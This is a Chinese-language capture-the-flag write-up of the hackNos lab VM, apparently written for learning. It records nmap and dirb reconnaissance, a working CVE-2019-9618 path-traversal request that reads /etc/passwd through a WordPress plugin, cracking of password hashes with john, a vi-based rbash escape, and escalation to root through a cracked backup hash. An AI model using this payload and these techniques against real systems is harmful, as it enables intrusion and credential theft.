前言

该在VMware中使用有点问题,没法正常分配IP,所以我是在VirtualBox中完成的。

攻击机ip:192.168.1.29

信息收集

上nmap扫描目标主机,得到靶机ip为192.168.1.28。

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali:~$ nmap -sP 192.168.1.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 21:21 EDT
Nmap scan report for 192.168.1.1
Host is up (0.013s latency).
Nmap scan report for 192.168.1.4
Host is up (0.041s latency).
Nmap scan report for 192.168.1.16
Host is up (0.0010s latency).
Nmap scan report for 192.168.1.28
Host is up (0.0030s latency).
Nmap scan report for 192.168.1.29
Host is up (0.00043s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.44 seconds

继续扫描目标主机上的服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
kali@kali:~$ nmap -p1-65535 -A 192.168.1.28
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 21:26 EDT
Nmap scan report for 192.168.1.28
Host is up (0.00015s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
|   256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_  256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds

发现了http服务和ssh服务。

漏洞挖掘

访问目标web站点,是apache服务的配置信息页面:

1

那接着拿dirb扫一下网站目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
kali@kali:~$ dirb http://192.168.1.28

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jul  9 23:43:56 2020
URL_BASE: http://192.168.1.28/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.28/ ----
+ http://192.168.1.28/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.28/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.1.28/tsweb/

---- Entering directory: http://192.168.1.28/tsweb/ ----
+ http://192.168.1.28/tsweb/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-includes/
+ http://192.168.1.28/tsweb/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/ ----
+ http://192.168.1.28/tsweb/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/css/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/images/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/includes/
+ http://192.168.1.28/tsweb/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/js/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/maint/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/network/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/user/     

---- Entering directory: http://192.168.1.28/tsweb/wp-content/ ----
+ http://192.168.1.28/tsweb/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/plugins/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/themes/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/uploads/

---- Entering directory: http://192.168.1.28/tsweb/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
	(Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.1.28/tsweb/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.1.28/tsweb/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
  
---- Entering directory: http://192.168.1.28/tsweb/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
  
---- Entering directory: http://192.168.1.28/tsweb/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
  
---- Entering directory: http://192.168.1.28/tsweb/wp-admin/network/ ----
+ http://192.168.1.28/tsweb/wp-admin/network/admin.php (CODE:302|SIZE:0)  
+ http://192.168.1.28/tsweb/wp-admin/network/index.php (CODE:302|SIZE:0)\

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/user/ ----
+ http://192.168.1.28/tsweb/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.28/tsweb/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/plugins/ ----
+ http://192.168.1.28/tsweb/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/themes/ ----
+ http://192.168.1.28/tsweb/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu Jul  9 23:44:08 2020
DOWNLOADED: 36896 - FOUND: 13

从上面的扫描结果可以看出的是,网站的根目录是http://192.168.1.28/tsweb,并且这是一个wordpress站点:

2

既然是wordpress站点,那就用wpscan进行扫描:

3

发现了一个插件gracemedia-media-player,在cve官网上搜索过后发现了CVE-2019-9618

4

这是一个文件包含漏洞,查看源码发现完全没有对用户的输入进行检查就进行了require_once操作从而导致了任意文件包含:

17

利用方式为:

1
/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

5

1
2
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

flag用户的密码是经过加密的,送到john中爆破:

1
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash

6

很快就得到flag用户的密码:topsecret

rbash绕过

从前面的/etc/passwd文件就知道,当前的用户的bash是/bin/rbash,很多命令是被禁止的,所以需要绕过rbash。绕过rbash的方法在靶场DC-2中有学习过。

因为vi命令是可以使用的,所以可以利用vi绕过。首先在vi编辑器中设置shell:

1
set shell=/bin/bash

8

然后调用该shell,并回车:

9

就可以看到当前的shell变成了bash:

10

但是当前用户的权限还是不够,接下去要进行提权。

提权

首先sudo -l查看当前用户可以sudo执行的命令:

1
2
3
flag@hacknos:/$ sudo -l
[sudo] password for flag: 
Sorry, user flag may not run sudo on hacknos.

flag用户没有执行sudo的权限。接着我们找一下有没有suid权限的文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
flag@hacknos:/$ find / -perm -u=s 2>/dev/null
/snap/core/9436/bin/mount
/snap/core/9436/bin/ping
/snap/core/9436/bin/ping6
/snap/core/9436/bin/su
/snap/core/9436/bin/umount
/snap/core/9436/usr/bin/chfn
/snap/core/9436/usr/bin/chsh
/snap/core/9436/usr/bin/gpasswd
/snap/core/9436/usr/bin/newgrp
/snap/core/9436/usr/bin/passwd
/snap/core/9436/usr/bin/sudo
/snap/core/9436/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9436/usr/lib/openssh/ssh-keysign
/snap/core/9436/usr/lib/snapd/snap-confine
/snap/core/9436/usr/sbin/pppd
/snap/core/8039/bin/mount
/snap/core/8039/bin/ping
/snap/core/8039/bin/ping6
/snap/core/8039/bin/su
/snap/core/8039/bin/umount
/snap/core/8039/usr/bin/chfn
/snap/core/8039/usr/bin/chsh
/snap/core/8039/usr/bin/gpasswd
/snap/core/8039/usr/bin/newgrp
/snap/core/8039/usr/bin/passwd
/snap/core/8039/usr/bin/sudo
/snap/core/8039/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8039/usr/lib/openssh/ssh-keysign
/snap/core/8039/usr/lib/snapd/snap-confine
/snap/core/8039/usr/sbin/pppd
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/umount
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newuidmap
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1

这里面有一个/usr/bin/at,我搜索了下确实存在漏洞,但是版本对照不上,所以利用suid提权的方法也走不太通。

再看看当前的系统内核版本:

1
2
flag@hacknos:/$ uname -a
Linux hacknos 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

ubuntu-4.15.0,在exploit上搜到了一个可能可用的exp: https://www.exploit-db.com/exploits/47163 ,但是没法编译,因为没有gcc:

11

然后我考虑在另一台ubuntu16.04编译好,然后下载到目标主机上,但是这样也还是不行:

12

尝试了三种最常见的提权手法都失败了之后,我被卡住了。然后我去找了别人的wp,说是在/var目录下有备份文件:

13

发现了md5加密的hash文件:

1
$1$rohit$01Dl0NQKtgfeL08fGrggi0

送到john解密,得到了密码!%hack41

14

前面我们从/etc/passwd文件可以看到还有一个用户rohit,可能这个就是该用户的密码,尝试切换用户发现能成功切换。

sudo -l查看发现该用户能够使用sudo执行所有命令:

15

所以直接查看/root目录,并读取该目录下的flag:

16

总结

做这个靶机可能还是想说需要多关注一下/var目录,可能里面会有一些意想不到的收获。